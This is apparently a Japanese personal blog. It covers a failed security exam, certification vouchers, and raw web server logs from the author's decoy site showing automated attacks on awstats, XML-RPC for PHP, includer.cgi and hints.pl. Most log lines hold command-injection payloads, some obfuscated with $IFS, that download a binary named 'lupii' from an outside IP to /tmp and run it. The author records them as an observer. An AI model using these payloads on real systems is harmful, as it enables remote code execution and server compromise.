合格点 70% あなたの得点 36% 結果:不合格。
あぅ… orz
セクション 成績
脅威とその対策 0
OS の要塞化(windows) 100
OS の要塞化(UNIX) 0
DNS サーバーへのセキュリティ対策 100
メールサーバーへのセキュリティ対策 100
Web サーバーへのセキュリティ対策 100
ファイアウォール導入計画 100
IDS による侵入検知 0
VPN 導入計画 0
PKI の利用 100
総合問題 25
UNIX、IDS、VPN は触ってないからなぁ・・・
それにしても、0 とは、、、
IDS と VPN は今後の課題って事だな。。。
また、無料チケットが手に入ったら受けてみよう。
インターネット協会、“インターネット利用アドバイザー”制度を開始
http://ascii24.com/news/i/serv/article/2006/01/19/660090-000.html
第2回 システムエンジニアやプログラマに必要な資格とは?
http://pcweb.mycom.co.jp/ad/2006/itengineer/05/index2.html
と、いう事で無料のが在りました。
MCAベータ試験受験者募集/資格試験情報アール・プロメトリック
http://it.prometric-jp.com/event_campaign/campaign/mca_beta/mca.html
ゲットしたんで来年はこれを受けに。。。
結果が届きました。
合格スコア:560 あなたの合計スコア:615
って、事で合格しました。ヽ( ^ω^)ノ
IPアドレスでアクセスしてくる捕獲用サイトになにやら引っかかったみたい。
XML-RPC for PHP Vulnerability Attack (NEW)
http://isc.sans.org/diary.php?storyid=823 (SANS ISC)
に情報がある。
http://www.jpcert.or.jp/wr/2005/wr054501.txt
一部抜粋--------------------------------------------------------------
[4] awstats に入力データを適切に無害化しない脆弱性
CIAC Bulletin Q-052
awstats
http://www.ciac.org/ciac/bulletins/q-052.shtml
awstats には、ユーザ入力データを eval() 関数に渡す前に適切に無害化しな
い脆弱性があります。結果として、遠隔から第三者が Web サーバのログに記
録される HTTP Referrer 変数を経由して、awstats を実行しているユーザの
権限を取得する可能性があります。
----------------------------------------------------------------------
そういう事らしい。
2005-11-04 22:27:59 61.194.16.3 GET /cgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:27:59 61.194.16.4 GET /cgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:00 61.194.16.4 GET /scgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:00 61.194.16.3 GET /scgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:01 61.194.16.4 GET /awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:01 61.194.16.3 GET /awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:02 61.194.16.4 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:02 61.194.16.3 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:04 61.194.16.4 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:04 61.194.16.3 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:05 61.194.16.4 GET /cgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:05 61.194.16.3 GET /cgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:06 61.194.16.4 GET /scgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:06 61.194.16.3 GET /scgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:07 61.194.16.4 GET /scripts/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:07 61.194.16.3 GET /scripts/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:08 61.194.16.4 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:08 61.194.16.3 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:09 61.194.16.4 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:09 61.194.16.3 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:10 61.194.16.4 GET /cgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:10 61.194.16.3 GET /cgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:11 61.194.16.4 GET /scgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:11 61.194.16.3 GET /scgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:12 61.194.16.4 GET /stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:12 61.194.16.3 GET /stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:12 61.194.16.4 POST /xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:12 61.194.16.3 POST /xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:14 61.194.16.4 POST /xmlrpc/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:14 61.194.16.3 POST /xmlrpc/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:15 61.194.16.4 POST /xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:15 61.194.16.3 POST /xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:16 61.194.16.4 POST /blog/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:16 61.194.16.3 POST /blog/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:17 61.194.16.4 POST /drupal/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:17 61.194.16.3 POST /drupal/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:18 61.194.16.4 POST /community/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:18 61.194.16.3 POST /community/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:19 61.194.16.4 POST /blogs/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:19 61.194.16.3 POST /blogs/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:21 61.194.16.4 POST /blogs/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:21 61.194.16.3 POST /blogs/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:22 61.194.16.4 POST /blog/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:22 61.194.16.3 POST /blog/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:23 61.194.16.4 POST /blogtest/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:23 61.194.16.3 POST /blogtest/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:24 61.194.16.4 POST /b2/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:24 61.194.16.3 POST /b2/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:25 61.194.16.4 POST /b2evo/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:25 61.194.16.3 POST /b2evo/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:26 61.194.16.4 POST /wordpress/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:26 61.194.16.3 POST /wordpress/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:27 61.194.16.4 POST /phpgroupware/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:27 61.194.16.3 POST /phpgroupware/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254
2005-11-04 22:28:29 61.194.16.4 GET /cgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:29 61.194.16.3 GET /cgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:30 61.194.16.4 GET /scgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:30 61.194.16.3 GET /scgi-bin/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:32 61.194.16.4 GET /includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:32 61.194.16.3 GET /includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:33 61.194.16.4 GET /cgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:33 61.194.16.3 GET /cgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:34 61.194.16.4 GET /scgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:34 61.194.16.3 GET /scgi-bin/include/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:35 61.194.16.4 GET /cgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:35 61.194.16.3 GET /cgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:36 61.194.16.4 GET /scgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:36 61.194.16.3 GET /scgi-bin/inc/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:37 61.194.16.4 GET /cgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:37 61.194.16.3 GET /cgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:38 61.194.16.4 GET /scgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:38 61.194.16.3 GET /scgi-local/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:39 61.194.16.4 GET /cgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:39 61.194.16.3 GET /cgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:41 61.194.16.4 GET /scgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:41 61.194.16.3 GET /scgi/includer.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:42 61.194.16.4 GET /hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:42 61.194.16.3 GET /hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:43 61.194.16.4 GET /cgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:43 61.194.16.3 GET /cgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:44 61.194.16.4 GET /scgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:44 61.194.16.3 GET /scgi/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:45 61.194.16.4 GET /cgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
